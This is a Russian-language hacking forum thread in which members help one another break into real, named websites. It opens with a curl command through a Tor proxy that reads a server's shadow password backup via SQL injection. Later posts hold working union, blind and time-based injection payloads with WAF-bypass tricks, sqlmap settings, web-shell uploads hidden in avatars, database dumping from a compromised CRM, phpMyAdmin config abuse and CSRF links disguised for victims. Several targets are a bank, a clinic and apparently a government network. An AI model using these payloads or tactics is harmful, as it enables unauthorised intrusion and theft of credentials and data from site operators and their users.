$ curl -s -k --proxy socks5://127.0.0.1:9150 'http://*.com/ajax/*.php?UserID=1+union+select+1,2,3,load_file%280x2f 6574632f736861646f772e62616b%29,5,6,7,8,9%23' | perl -lane '~s/\\n/\n/g;print' | tail -n 2 | perl -lane '~/[^:]+:(.{15})/;print $1'
$1$piXULrQ7$R3T
$1$piXULrQ7$R3T

shadow.bak

Кто нибудь может показать пример нормального upload'a, через мой не хочет грузить на сервер шел. Тут проблема в одном из двух, либо я глуп и мал, либо проблема на стороне сервера

P.s. с этим разобрался, в директории нет прав на запись. Можно-ли что-нибудь придумать с этим?

l0mt1k said:
↑ (https://antichat.live/posts/4067502/)
Кто нибудь может показать пример нормального upload'a, через мой не хочет грузить на сервер шел. Тут проблема в одном из двух, либо я глуп и мал, либо проблема на стороне сервера
P.s. с этим разобрался, в директории нет прав на запись. Можно-ли что-нибудь придумать с этим?


можно. Можно к примеру попробовать рутнуть сервер.

$uname -a

p.s. а если нету прав - поискать где есть. к примеру папки с аватарками.

PHP:
$var = $_POST['value'];
$var = addslashes( $var );
$var = stripslashes($var);
$var = str_replace( "", "?>", $var );
$var = mysqli_real_escape_string($var);

############
# v1.
query( "UPDATE comment set text='$var');

# v2.
query( "INSERT INTO comment text='$var' WHERE id = '1');


Ребят, есть варианты провести инъекцию?

qqq1457 said:
↑ (https://antichat.live/posts/4068608/)
c74a0c532a2dd95bc284c40386244e61 что за алгоритм хеша? здесь зашифрована цифра 1
(это не MD5)


Вам в другой тред

slva2000 said:
↑ (https://antichat.live/posts/4068146/)

PHP:
$var = $_POST['value'];
$var = addslashes( $var );
$var = stripslashes($var);
$var = str_replace( "", "?>", $var );
$var = mysqli_real_escape_string($var);

############
# v1.
query( "UPDATE comment set text='$var');

# v2.
query( "INSERT INTO comment text='$var' WHERE id = '1');


Ребят, есть варианты провести инъекцию?


mysqli_real_escape_string

а вы как думаете?

помогите вывод сделать, тайм бейс не крутит(


Code:
https://www.denkmalschutz.de/denkmale-erleben/terminkalender.html?tx_igcalendar_pi1[termin][eventSuche]=1&tx_igcalendar_pi1[state]=118)+union/**//**//**/select+1+--+

DezMond™ said:
↑ (https://antichat.live/posts/4068857/)
помогите вывод сделать, тайм бейс не крутит(

Code:
https://www.denkmalschutz.de/denkmale-erleben/terminkalender.html?tx_igcalendar_pi1[termin][eventSuche]=1&tx_igcalendar_pi1[state]=118)+union/**//**//**/select+1+--+



вывод через union мне добиться не удалось, но там boolen есть


Code:
118)/**/AND/**/1=2+--+s' | grep 'event_417'

118)/**/AND/**/1=1+--+s' | grep 'event_417'


хм что интересно функции substring,mid,right,left по какой то причине на работают.. но нормально работает like, версия базы 5.6


Code:
118)/**/AND/**/version()*1+like+%275.6%%27+--+s' | grep 'event_417'


к information_schema тоже доступ есть


Code:
118)/**/AND/**/(select+table_name+from+information_schema.tables+ limit+1)+like+%27%%27+--+s' | grep 'event_417'


ещё там операция = не всегда работает, лучше юзать like

скульмап по какой то причине в упор скулю не видит

-----------

чорт, там запятая фильтруется -_-

ACat said:
↑ (https://antichat.live/posts/4067542/)
можно. Можно к примеру попробовать рутнуть сервер.
$uname -a
p.s. а если нету прав - поискать где есть. к примеру папки с аватарками.


Ну если честно, upload там спокойно льётся через sqlmap, но если потом через этот upload лить shell, то он не выполняется, ощущение такое как будто нет поддержки php :/

BabaDook said:
↑ (https://antichat.live/posts/4069095/)
не выполняется потому что php не отрабатывает


Именно

BabaDook said:
↑ (https://antichat.live/posts/4069098/)
Это потому что шелл не отрабатывает?


В общем, заливаю upload, через него заливаю шелл, открыв его сервер его не обрабатывает как php, а выводит просто текст с кодом.

Хотя upload работает нормально.


шелл на html?


php

t0ma5 said:
↑ (https://antichat.live/posts/4069028/)
вывод через union мне добиться не удалось, но там boolen есть

Code:
118)/**/AND/**/1=2+--+s' | grep 'event_417'

118)/**/AND/**/1=1+--+s' | grep 'event_417'


хм что интересно функции substring,mid,right,left по какой то причине на работают.. но нормально работает like, версия базы 5.6

Code:
118)/**/AND/**/version()*1+like+%275.6%%27+--+s' | grep 'event_417'


к information_schema тоже доступ есть

Code:
118)/**/AND/**/(select+table_name+from+information_schema.tables+ limit+1)+like+%27%%27+--+s' | grep 'event_417'


ещё там операция = не всегда работает, лучше юзать like
скульмап по какой то причине в упор скулю не видит
-----------
чорт, там запятая фильтруется -_-


http://www.websec.ca/blog/view/Bypassing_WAFs_with_SQLMap


l0mt1k said:
↑ (https://antichat.live/posts/4069090/)
Ну если честно, upload там спокойно льётся через sqlmap, но если потом через этот upload лить shell, то он не выполняется, ощущение такое как будто нет поддержки php :/


Стоп, что-то я не понял... Есть иньжект, sqlmap раскрутил его, залил через mysql в файл.php код и код не исполняется?

Ааа, понял, в папке, куда залит шелл нету прав...

Попробуй прочитать конфиг.php. Там будет логин и пароль подключения к БД.

ssh mysql@server

ACat said:
↑ (https://antichat.live/posts/4069196/)
http://www.websec.ca/blog/view/Bypassing_WAFs_with_SQLMap


мимо, sqlmap не видит самую простую инъекцию and 1=1/and 1=2 впрочем даже если бы видел тамперы там не помогут, фильтруются запятые, плюс некоторые запросы чуть меняешь логику - не отрабатывают, там проще свой скрипт набросать

чё можно сделать?


Code:
http://www.mallorca-holiday-rentals.info/index.php?id=5&L=1&tx_fewo_mail%5Bobjref%5D=2604'

DezMond™ said:
↑ (https://antichat.live/posts/4069587/)
чё можно сделать?

Code:
http://www.mallorca-holiday-rentals.info/index.php?id=5&L=1&tx_fewo_mail%5Bobjref%5D=2604'





Code:
http://www.mallorca-holiday-rentals.info/index.php?id=5&L=1&tx_fewo_mail%5Bobjref%5D=2604)+order+by+24+--+-

ZodiaX said:
↑ (https://antichat.live/posts/4069637/)

Code:
http://www.mallorca-holiday-rentals.info/index.php?id=5&L=1&tx_fewo_mail%5Bobjref%5D=2604)+order+by+24+--+-



а дальше? какой толк подбирать колонки, если нет вывода?

DezMond™ said:
↑ (https://antichat.live/posts/4069648/)
а дальше? какой толк подбирать колонки, если нет вывода?


Да, сорри, думал как слепую можно раскрутить, ан нет.

DezMond™ said:
↑ (https://antichat.live/posts/4069648/)
а дальше? какой толк подбирать колонки, если нет вывода?


вывод может и есть, запятая похоже опять фильтруется

DezMond™ said:
↑ (https://antichat.live/posts/4069648/)
а дальше? какой толк подбирать колонки, если нет вывода?




Code:
union/**/select/**/*/**/from/**/(select/**/1)a/**/join/**/(select/**/2)b/**/join/**/(select/**/3)c/**/join/**/(select/**/4)d/**/join/**/(select/**/5)e/**/join/**/(select/**/6)f/**/join/**/(select/**/7)g/**/join/**/(select/**/8)h/**/join/**/(select/**/9)i/**/join/**/(select/**/10)j/**/join/**/(select/**/11)k/**/join/**/(select/**/12)kq/**/join/**/(select/**/13)kz/**/join/**/(select/**/14)kr/**/join/**/(select/**/15)kt/**/join/**/(select/**/16)ky/**/join/**/(select/**/17)ki/**/join/**/(select/**/18)kk/**/join/**/(select/**/19)ko/**/join/**/(select/**/20)ka/**/join/**/(select/**/21)kqq/**/join/**/(select/**/version())kee/**/join/**/(select/**/23)kaa/**/join/**/(select/**/24)kbbb+--+s

5.6.19-67.0-log

ACat said:
↑ (https://antichat.live/posts/4068854/)
mysqli_real_escape_string
а вы как думаете?


Если бы у меня было известное решение, то, наверное, я бы не спрашивал.

В любом случае, спасибо за ответ.

t0ma5 said:
↑ (https://antichat.live/posts/4069674/)

Code:
union/**/select/**/*/**/from/**/(select/**/1)a/**/join/**/(select/**/2)b/**/join/**/(select/**/3)c/**/join/**/(select/**/4)d/**/join/**/(select/**/5)e/**/join/**/(select/**/6)f/**/join/**/(select/**/7)g/**/join/**/(select/**/8)h/**/join/**/(select/**/9)i/**/join/**/(select/**/10)j/**/join/**/(select/**/11)k/**/join/**/(select/**/12)kq/**/join/**/(select/**/13)kz/**/join/**/(select/**/14)kr/**/join/**/(select/**/15)kt/**/join/**/(select/**/16)ky/**/join/**/(select/**/17)ki/**/join/**/(select/**/18)kk/**/join/**/(select/**/19)ko/**/join/**/(select/**/20)ka/**/join/**/(select/**/21)kqq/**/join/**/(select/**/version())kee/**/join/**/(select/**/23)kaa/**/join/**/(select/**/24)kbbb+--+s

5.6.19-67.0-log


ax*eть.

Парни подскажите, если есть иньекция но сервер на генту и не возвращает никаких ошибок как действовать??

Вернее что бы не быть голословным вот реальный пример:

?id_list=359982' or 1=1 -- 'a --> вывод

?id_list=359982' or 1=2 -- 'a --> 404

?id_list=359982' ORDER BY 1 -- 'a --> 404

?id_list=359982' GROUP BY 1 -- 'a --> 404

Напомню что ошибки не отображаются.

Эни айдиас?

ACat said:
↑ (https://antichat.live/posts/4069919/)
Вернее что бы не быть голословным вот реальный пример:
?id_list=359982' or 1=1 -- 'a --> вывод
?id_list=359982' or 1=2 -- 'a --> 404
?id_list=359982' ORDER BY 1 -- 'a --> 404
?id_list=359982' GROUP BY 1 -- 'a --> 404
Напомню что ошибки не отображаются.
Эни айдиас?


это blind sql

Про инекции и Способы обнаружения Blind SQL-инъекций:

https://www.ptsecurity.com/upload/corporate/ru-ru/download/PT-devteev-Advanced-SQL-Injection.pdf

софт:/threads/240692/ (https://antichat.live/threads/240692/)

или ручками крути

qqq1457 said:
↑ (https://antichat.live/posts/4069974/)
это blind sql
Про инекции и Способы обнаружения Blind SQL-инъекций:
https://www.ptsecurity.com/upload/corporate/ru-ru/download/PT-devteev-Advanced-SQL-Injection.pdf
софт:
/threads/240692/ (https://antichat.live/threads/240692/)
или ручками крути


да, это я понимаю. но там такой сервер, что блайндом его всё лето можно взламывать

ACat said:
↑ (https://antichat.live/posts/4069997/)
да, это я понимаю. но там такой сервер, что блайндом его всё лето можно взламывать


Тогда кури в сторону ООБ

BabaDook said:
↑ (https://antichat.live/posts/4069998/)
Тогда кури в сторону ООБ


прошу прощения, а что такое ООБ?

ACat said:
↑ (https://antichat.live/posts/4070054/)
прошу прощения, а что такое ООБ?


http://www.blackhat.com/presentatio...-europe-09-Damele-SQLInjection-whitepaper.pdf (http://www.blackhat.com/presentations/bh-europe-09/Guimaraes/Blackhat-europe-09-Damele-SQLInjection-whitepaper.pdf)

Все подробно и ясно - Page №22

прошу помочь залить шелл.Напишите приватно

cat1vo said:
↑ (https://antichat.live/posts/4070082/)
http://www.blackhat.com/presentatio...-europe-09-Damele-SQLInjection-whitepaper.pdf (http://www.blackhat.com/presentations/bh-europe-09/Guimaraes/Blackhat-europe-09-Damele-SQLInjection-whitepaper.pdf)
Все подробно и ясно - Page №22


Спасибо.

Парни, такой вопрос, есть сервер удаленный на нем шелл. Это файловый сервер целого CRM.

Есть сервер базы данных этого же ЦРМ, но он отдельный. Подключится - могу. С сервера на сервер.

Дампнуть не получается. Коннект обрывается посли 20 мб данных. А дампить много.

Как быть?

cat1vo said:
↑ (https://antichat.live/posts/4070082/)
http://www.blackhat.com/presentatio...-europe-09-Damele-SQLInjection-whitepaper.pdf (http://www.blackhat.com/presentations/bh-europe-09/Guimaraes/Blackhat-europe-09-Damele-SQLInjection-whitepaper.pdf)
Все подробно и ясно - Page №22


такс, mysqldump мне помог.

Приступаю к курению мануала.

Кстати, несколько лет назад я был мал и глуп и вы меня не долюбливали. Писал под ником Pirotexnik. Потом в армию забрали)

Всем доброй ночи :3

Code:
http://www.klinikum-stuttgart.de/kliniken-institute-zentren/frauenklinik-schwerpunkt-geburtshilfe/termine-und-veranstaltungen/?tx_aseventcalendar[attendant]=6

тока блинд? или у когото вывод получится сделать?

После заливки шелла, при переходе на шелл, становится битый код, и файл выглядит вот так, в чем может быть проблема ? http://prntscr.com/ewegs9

возможно не правильный линк? заливал через картинку

помогите найти путь до шелла, за $$$

negativmans said:
↑ (https://antichat.live/posts/4072333/)
После заливки шелла, при переходе на шелл, становится битый код, и файл выглядит вот так, в чем может быть проблема ?
http://prntscr.com/ewegs9
возможно не правильный линк? заливал через картинку


если бы путь был не правильный - он бы у тебя вообще не открылся

посмотри сорцы открываемой страницы, есть в начале пхп код

[QUOTE="t0ma5"]
t0ma5 said:
↑ (https://antichat.live/posts/4072336/)
если бы путь был не правильный - он бы у тебя вообще не открылся
посмотри сорцы открываемой страницы, есть в начале пхп код

[QUOTE="t0ma5"]
t0ma5 said:
↑ (https://antichat.live/posts/4072336/)
если бы путь был не правильный - он бы у тебя вообще не открылся
посмотри сорцы открываемой страницы, есть в начале пхп код

negativmans said:
↑ (https://antichat.live/posts/4072348/)
а на html нету шеллов?


html это язык разметки

SSI разве что если, хотя наверно экзотика уже, гугли "html ssi web shell"

всё таки проблема с путями, потому что картинка даже открывается в тексте! помогите найти путь пожалуйста до шелла!

возможно нет прав для выполнения. Попробуй в аватарку встроить не большой шелл типа

и потом обратитьтся avatarka.jpg.php?a=phpinfo();

negativmans said:
↑ (https://antichat.live/posts/4072377/)
всё таки проблема с путями, потому что картинка даже открывается в тексте! помогите найти путь пожалуйста до шелла!


тебе же написали выше, что проблема не с путями, проблема с правами.

Ты случайно не молдован?

ACat said:
↑ (https://antichat.live/posts/4072571/)
возможно нет прав для выполнения. Попробуй в аватарку встроить не большой шелл типа
и потом обратитьтся avatarka.jpg.php?a=phpinfo();


Файл открывается по такой ссылке site.com/user/12345/avatar?123456, где просто выводится содержимое файла, без разницы на расширение, то есть мы получаем его контент, а не выполнение. Так как даже картинка, выводится текстом, отсюда обычная читалка. Получить полный путь до файлов заливаемых на сервер возможности нет (видно что об этом позаботились), что бы понять где и как они лежат и в какой расширение приходят на сервер, возможно оно и заливается в .php, но обратиться к файлу мы не можем, потому всякие догадки про права не верны!

З.Ы. Не стоит делать поспешных выводов не зная сути проблемы! Надеюсь я ясно объяснил и вопросы лишние отпадут.

ACat said:
↑ (https://antichat.live/posts/4072572/)
тебе же написали выше, что проблема не с путями, проблема с правами.
Ты случайно не молдован?


мы с cat1vo (https://antichat.live/members/94094/) Молдовани.

Но ситуацию это не меняет не как.

У меня братва в Кищиневе есть, пишут похоже)

Есть CSRF методом GET удаляется пост на саите где временно можно засунуть пробовал как то замутить через онлайн сниффер но там есть только редирект и при этом мои URL палится

negativmans said:
↑ (https://antichat.live/posts/4072587/)
мы с
cat1vo (https://antichat.live/members/94094/)
Молдовани.
Но ситуацию это не меняет не как.




ACat said:
↑ (https://antichat.live/posts/4072648/)
У меня братва в Кищиневе есть, пишут похоже)


Я тоже

Octavian said:
↑ (https://antichat.live/posts/4073841/)
Есть CSRF методом GET удаляется пост на саите где временно можно засунуть пробовал как то замутить через онлайн сниффер но там есть только редирект и при этом мои URL палится


Тебе csrfку надо посылать?

Если гетовская это еще проще даже.

В скрипт php и на любой хост.


Code:
");

Если постом была бы можно было бы тоже легко сделать


Code:
" method= "POST" name="Vuln" >
А далее любой js кой можно написать примерно следующий скрипт
document.getElementByName('Vuln').submit()

SooLFaa said:
↑ (https://antichat.live/posts/4076046/)
Тебе csrfку надо посылать?
Если гетовская это еще проще даже.
В скрипт php и на любой хост.

Code:
");

Если постом была бы можно было бы тоже легко сделать

Code:
" method= "POST" name="Vuln" >
А далее любой js кой можно написать примерно следующий скрипт
document.getElementByName('Vuln').submit()



Да но я не хочу зарегать хост только для CSRF мне нужно быстро как то [GET]

Там временное хранение html файлов где то сервис

Octavian said:
↑ (https://antichat.live/posts/4076063/)
Да но я не хочу зарегать хост только для CSRF мне нужно быстро как то [GET]
Там временное хранение html файлов где то сервис


Если гетом, то зачем тебе посредник. Прям гетом и кинь только за urlencode

Или через сервис какой нить спрячь ссылку

https://tinyurl.com/

SooLFaa said:
↑ (https://antichat.live/posts/4076093/)
Если гетом, то зачем тебе посредник. Прям гетом и кинь только за urlencode
Или через сервис какой нить спрячь ссылку
https://tinyurl.com/


Посредник нужен чтоб жертва увидела фото

М


SooLFaa said:
↑ (https://antichat.live/posts/407/)
Если гетом, то зачем тебе посредник. Прям гетом и кинь только за urlencode
Или через сервис какой нить спрячь ссылку
https://tinyurl.com/


Мне нужен 2 редирект 1 сылка редирект на CSRR и потом редирект на картинку

Octavian said:
↑ (https://antichat.live/posts/4076124/)
М
Мне нужен 2 редирект 1 сылка редирект на CSRR и потом редирект на картинку


Так, моя твоя не понимай. Тебе надо нормально задачу сформулировать, а потом мы всем форумом подумаем над её решением.

Шалом.

Знатоки, подскажите, что дальше делать в следующей ситуации:

Получил доступ к config.inc.php ( это phpMyAdmin ).

Есть blowfish_secret.

['auth_type'] стоит 'cookie';

Есть юзер controluser и пароль controlpass.

Также есть PmaAbsoluteUri. Перехожу по нему.

Пытаюсь залогиниться, задав controluser и controlpass - не пускает.

Так понимаю, настроена аутентификауия по кукам ?

Просто первый раз с этим имею дело. Нужно как-то дешифровать blowfish_secret ? Это ведь фраза подсказка ?

Подскажите, куда копать, чтобы зайти в phpMyAdmin ?

Нужно составить куку и её послать для логина ? Или что-то другое ?

Пожалуйста, помогите с вопросом: /threads/424557/page-95#post-4076253 (https://antichat.live/threads/424557/page-95/)

Как дальше быть с config.inc.php ?

Друзья, просьба. Поделитесь кому не жалко сайтом на котором присутствует XXE уязвимость, хочу на её примере изучить данный вектор.

Gorbachev said:
↑ (https://antichat.live/posts/4078179/)
Друзья, просьба. Поделитесь кому не жалко сайтом на котором присутствует XXE уязвимость, хочу на её примере изучить данный вектор.


XML External Entity (http://challenge01.root-me.org/web-serveur/ch29/)

cat1vo (https://antichat.live/members/94094/) благодарю.

PS: но сайт почему то не открывается

Я через Havij пробовал получалось,но частично

например в названии БД b?tsys?em,второй раз крутанёт правильно,остальное так же криво,таблицы походу никогда не выкрутит

поймал на 1000 ms delay,уязвимость time based error. версия sql 5.7.x предположительно(мб 5.7.16)

Если идёт дальше 1500 ms,то уже не крутит,вообще . Как быть ? Скулмап не видит уязвимость вообще,а она есть . Можно и в ЛС,покажу .

SaNDER said:
↑ (https://antichat.live/posts/4078669/)
Я через Havij пробовал получалось,но частично
например в названии БД b?tsys?em,второй раз крутанёт правильно,остальное так же криво,таблицы походу никогда не выкрутит
поймал на 1000 ms delay,уязвимость time based error. версия sql 5.7.x предположительно(мб 5.7.16)
Если идёт дальше 1500 ms,то уже не крутит,вообще . Как быть ? Скулмап не видит уязвимость вообще,а она есть . Можно и в ЛС,покажу .


--dbms=mysql --level 5 --technique=T

Gorbachev said:
↑ (https://antichat.live/posts/4078606/)
cat1vo (https://antichat.live/members/94094/) благодарю.

PS: но сайт почему то не открывается


Потому что под своей учеткой зайти надо на root-me.org

RWD said:
↑ (https://antichat.live/posts/4078724/)
--dbms=mysql --level 5 --technique=T




Code:
[CRITICAL] all parameters are not injectable, try to increase --level
/--risk values to perform more tests. Rerun without providing the --technique sw
itch. Give it a go with the --text-only switch if the target page has a low perc
entage of textual content (~96.39% of page content is text)

SaNDER said:
↑ (https://antichat.live/posts/4080873/)

Code:
[CRITICAL] all parameters are not injectable, try to increase --level
/--risk values to perform more tests. Rerun without providing the --technique sw
itch. Give it a go with the --text-only switch if the target page has a low perc
entage of textual content (~96.39% of page content is text)



добавь --risk=3

можно еще --random-agent и --timeout=60. а вообще странно, что блядский хаваж крутит, а скульмап нет

Имеется SQL сервер - Red database. Веб-приложения нету, имеется клиентское приложение написанное на C++. Связь между сегментами выполняется через интернет по VPN. Можно ли выполнить SQL инъекцию?

Yrovdul said:
↑ (https://antichat.live/posts/4082334/)
Имеется SQL сервер - Red database. Веб-приложения нету, имеется клиентское приложение написанное на C++. Связь между сегментами выполняется через интернет по VPN. Можно ли выполнить SQL инъекцию?


Мало инфы. Что за сегменты? Обращение к Сиукул-серверу по защищенному протоколу? Если нет, то можно отправлять запросы прямо так из SQL IDE инжекция не нужна, часто такие приложения делаються для внутренней сети.

Что за SQL-сервер, возможно если крутой сервер типа Оракла, там могучие средства для разделения полномочий и прав. Возможно доступна только не приватная инфа

artkar said:
↑ (https://antichat.live/posts/4082344/)
Мало инфы. Что за сегменты? Обращение к Сиукул-серверу по защищенному протоколу? Если нет, то можно отправлять запросы прямо так из SQL IDE инжекция не нужна, часто такие приложения делаються для внутренней сети.
Что за SQL-сервер, возможно если крутой сервер типа Оракла, там могучие средства для разделения полномочий и прав. Возможно доступна только не приватная инфа


Дистрибутив Firebird - Red DataBase. Мне необходимо найти уязвимость для SQL инъекцииhttp://s4.uploads.ru/3u4Vo.jpg

ХЗ Firebird никогда с ней не имел дел.

в архитектуре не вижу ВПН и вообще каких то навороченных защит. Походу классическая двухзвенная архитектура.

Если не знаешь никаких утилит мониторинга для Firebird, то вариантов два:

Собрать снифером дамп и посмотреть там на наличии уязвимых SQL-запросов, но Attention походу контора госслужбы какой то тебя могут спалить, когда снифер работает это очень заметно в сети...

если запросы не найдешь то вариант второй: reverse-engineering клиентского приложения.

Кароч кратко, технология SQL-инжектинга тем и хороша что не зависит от сопутствующего ПО, твоя схема вполне может быть сплотабельная, даже более чем Вэб-приложения, единственно задача поиска требует более сложных технических решений.

artkar said:
↑ (https://antichat.live/posts/4082882/)
ХЗ Firebird никогда с ней не имел дел.
в архитектуре не вижу ВПН и вообще каких то навороченных защит. Походу классическая двухзвенная архитектура.
Если не знаешь никаких утилит мониторинга для Firebird, то вариантов два:
Собрать снифером дамп и посмотреть там на наличии уязвимых SQL-запросов, но Attention походу контора госслужбы какой то тебя могут спалить, когда снифер работает это очень заметно в сети...
если запросы не найдешь то вариант второй: reverse-engineering клиентского приложения.
Кароч кратко, технология SQL-инжектинга тем и хороша что не зависит от сопутствующего ПО, твоя схема вполне может быть сплотабельная, даже более чем Вэб-приложения, единственно задача поиска требует более сложных технических решений.


1) VPN вверху в облачке написано. Его роль выполняет АПКШ Континент. Справа сегмент сети на уровне города. Слева региональный уровень. Есть ещё 3й на уровне страны.

2) http://www.ibase.ru/d_tools/ Вот вроде бы утилиты для мониторинга и администрирования?

3) Что значит сплотабельная?

Yrovdul said:
↑ (https://antichat.live/posts/4082991/)
1) VPN вверху в облачке написано. Его роль выполняет АПКШ Континент. Справа сегмент сети на уровне города. Слева региональный уровень. Есть ещё 3й на уровне страны.


А да, точно не заметил, в таком виде ВПН тебе не помеха. Если ты кончено будешь с рабочего места .


Yrovdul said:
↑ (https://antichat.live/posts/4082991/)
2)
http://www.ibase.ru/d_tools/
Вот вроде бы утилиты для мониторинга и администрирования?


Очень хорошо, вот работай. Или ты предлагаешь мне их скачать?


Yrovdul said:
↑ (https://antichat.live/posts/4082991/)
3) Что значит сплотабельная?


Значит подвержена атаке при помощи сплоета.

доброго времени суток господа. Подскажите, есть ли уязвимости на форумах phpBB 3.0.5 и выше???

По гуглю ничего толкового не нашел, в секурити лаб тоже.

Есть саит которыи не разрешает регать больше одного акаунта 1 емаилом но при вводе (пробел)123@mail.ru (mailto:123@mail.ru) почта считается как другая и подтверждение по почте все работает это уже баг какие последующие баги может открыть данный баг?

Octavian said:
↑ (https://antichat.live/posts/4089497/)
Есть саит которыи не разрешает регать больше одного акаунта 1 емаилом но при вводе (пробел)
123@mail.ru (mailto:123@mail.ru)
почта считается как другая и подтверждение по почте все работает это уже баг какие последующие баги может открыть данный баг?


возможно, что-то в духe " admin@site.com (mailto:admin@site.com) mymail@mail.com (mailto:mymail@mail.com) "

" admin@site.com (mailto:admin@site.com), mymail@mail.com (mailto:mymail@mail.com) "

а потом востановление пароля...

У меня другой вопрос, может cat1vo ответит на него...

Есть сайт, сайт мебельный.

http://mt.ua/

Надо найти в нем баги, что бы взяли на работу.


Cookie:
XSRF-TOKEN=eyJpdiI6Ik1EY3lxWWNPeURrVDhsNWh1MmR4akE9PSIs InZhbHVlIjoiNDQ4dVwvV1dzS3poRCtcL3RRKzdvS25mQlFKaE xFRXE4bU9CTkVVT3I0d0NhQnZKeUJEMFU4d25NZEJKRUtDM2pU OVwvYlFEeTdkc3VJUWpGdk1FTCt4Vmc9PSIsIm1hYyI6IjhjZG JjYjU0N2Y0MTJlZmQ0ZGNiNWJlMTIxZTc3MDY4ZTZlMWQ4NWZh NzA0ZjgyYjIzNjYwOWMzNzlmMTQyOGEifQ%3D%3D; laravel_session=eyJpdiI6Imt1a3Z3eVpJcGJLcTJERjA0ZX p1YXc9PSIsInZhbHVlIjoibWZuUzMxdVRxNjk4b0JxXC9XZU9q SUtNc0E0cjZ4d1JTcDlqZ2R6K2lzejhFWVlCOWIrN3dGRjhIQl dBbzZ6TkJEZkluVEp1WXZERUtFWEpBUG1EWHhBPT0iLCJtYWMi OiI2MjcwOGFjN2VjOTg2NmZmNjJkZjY5ODgyODU4ZGY4MWU4MT diYjE1NWMyZTM4Y2NkMWU4MjkwMzdjMTNlYTAyIn0%3D


раскодировав получаем


Cookie:
XSRF-TOKEN={"iv":"MDcyqYcOyDkT8l5hu2dxjA==","value":"448u\/WWsKzhD+\/tQ+7oKnfBQJhLEEq8mOBNEUOr4wCaBvJyBD0U8wnMdBJEKC3jT 9\/bQDy7dsuIQjFvMEL+xVg==","mac":"8cdbcb547f412efd4dcb5be121e77068e6e1d85fa704f82b23 6609c379f1428a"fQ%3D%3D;
laravel_session={"iv":"kukvwyZIpbKq2DF04ezuaw==","value":"mfnS31uTq698oBq\/WeOjIKMsA4r6xwRSp9jgdz+isz8EYYB9b+7wFF8HBWAo6zNBDf InTJuYvDEKEXJAPmDXxA==","mac":"62708ac7ec9866ff62df69882858df81e817bb155c2e38ccd1 e829037c13ea02In0%3D


что это такое. с чем его едят?

ACat said:
↑ (https://antichat.live/posts/4089654/)
что это такое. с чем его едят?


можно же погуглить, токен от межсайтовой подделки запросов

http://repository.root-me.org/Explo... loose comparison - Type Juggling - OWASP.pdf (http://repository.root-me.org/Exploitation%20-%20Web/EN%20-%20PHP%20loose%20comparison%20-%20Type%20Juggling%20-%20OWASP.pdf) - примерно в середине рассказывает про баг в ларавеле для обхода проверки XSRF, вообще хорошая pdf, про типы данных и проверки

ти клясный

ACat said:
↑ (https://antichat.live/posts/4089665/)
...


фу чел( плюсануть пост вполне достаточно

t0ma5 said:
↑ (https://antichat.live/posts/4089675/)
фу чел( плюсануть пост вполне достаточно


чувак, я - Кот.

Парни подскажите что можно попробовать в такой ситуации:

par1=sleep(20) -> time = 20024 ms

par1=eval(sleep(20)) -> time 2000ms

и так далее....

Как определить что за интерпретатор принимает параметр? Чей код инжектить?

Справшивал по phpbb 3.0.5 - есть в нем уязвимости??? Кто нибудь ответит??? ))

google phpbb 3.0.5 exploit

Добрый подскажите, как раскрутить данную sql (параметр id)

.SpoilerTarget" type="button">Spoiler: посмотреть
Авторизация:


Code:
bringthemes.com/natural-food/home-1/admin/ (demo/demo)

Пробую:


Code:
bringthemes.com/natural-food/home-1/admin/index.php?route=extension/module/bringblog/comment&token=Hc0bs042rmLz50tctvPv2grNiWgYZqaF&id='+AND+EXTRACTVALUE(5632,CONCAT(0x3a,((select(su bstring(group_concat(username),1,32))from(oc_user) ))))--+uHHl


но в ответ постоянная загрузка и отрубает (Error - Connection reset)

Подскажите что фильтрует и как обойти?

обратил внимание что не нравится ему select и group_concat, но могу ошибаться в разных вариациях не выходит никак((

kacergei said:
↑ (https://antichat.live/posts/4091288/)
Добрый подскажите, как раскрутить данную sql (параметр id)
Spoiler: посмотреть
Авторизация:

Code:
bringthemes.com/natural-food/home-1/admin/ (demo/demo)

Пробую:

Code:
bringthemes.com/natural-food/home-1/admin/index.php?route=extension/module/bringblog/comment&token=Hc0bs042rmLz50tctvPv2grNiWgYZqaF&id='+AND+EXTRACTVALUE(5632,CONCAT(0x3a,((select(su bstring(group_concat(username),1,32))from(oc_user) ))))--+uHHl

но в ответ постоянная загрузка и отрубает (Error - Connection reset)
Подскажите что фильтрует и как обойти?
обратил внимание что не нравится ему select и group_concat, но могу ошибаться в разных вариациях не выходит никак((


Зачем идти в Москву через Китай


Code:
http://bringthemes.com/natural-food/home-1/admin/index.php?route=extension/module/bringblog/comment&id=-1 union /*!12345select*/ 1,2,3,4,user(),version%0A(),7 --+uHHl&token=nGLvYhzmGxV0JoQDKfwjr1xiBwes8qoF

Бапассить select можно старыми добрыми комментами

А байпассить функции с помощью %0A перед ()

UPD: И ты используешь error-based хотя здесь самый обычный UNION

/vuln.php?id=-1+union+all+select+1,2,3,4,5,6,7,8,9,0,11,12,13,14 ,15,16,17,18,19,20,21,22,23

Как обойти фильтрацию? Дело в том, что если значение параметра содержит union и select, выводится ошибка типа hacking attemp. uni/**/on пробовал не помогает.

extjs said:
↑ (https://antichat.live/posts/4091562/)
/vuln.php?id=-1+union+all+select+1,2,3,4,5,6,7,8,9,0,11,12,13,14 ,15,16,17,18,19,20,21,22,23
Как обойти фильтрацию? Дело в том, что если значение параметра содержит union и select, выводится ошибка типа hacking attemp. uni/**/on пробовал не помогает.


Таргет дай нормальный, векторов куча, если hacking attemp - это скорее всего mod security - он байпассится в том числе векторов на один пост выше

brown said:
↑ (https://antichat.live/posts/4091025/)
google phpbb 3.0.5 exploit


Благодарю, но хотелось бы развернутого ответа, если не сложно.

extjs said:
↑ (https://antichat.live/posts/4091562/)
/vuln.php?id=-1+union+all+select+1,2,3,4,5,6,7,8,9,0,11,12,13,14 ,15,16,17,18,19,20,21,22,23
Как обойти фильтрацию? Дело в том, что если значение параметра содержит union и select, выводится ошибка типа hacking attemp. uni/**/on пробовал не помогает.


/!*50000bla bla bla*/

extjs said:
↑ (https://antichat.live/posts/4091562/)
/vuln.php?id=-1+union+all+select+1,2,3,4,5,6,7,8,9,0,11,12,13,14 ,15,16,17,18,19,20,21,22,23
Как обойти фильтрацию? Дело в том, что если значение параметра содержит union и select, выводится ошибка типа hacking attemp. uni/**/on пробовал не помогает.


попробуй передать id с помощью POST

Попробуй url encode

Попробуй char encode

всем привет,

кто может, помогиет раскрутить эту скулю:


Code:
http://www.sala amsombank.com/pages.php?id=\

sepo said:
↑ (https://antichat.live/posts/4095038/)
всем привет,
кто может, помогиет раскрутить эту скулю:

Code:
http://www.sala amsombank.com/pages.php?id=\



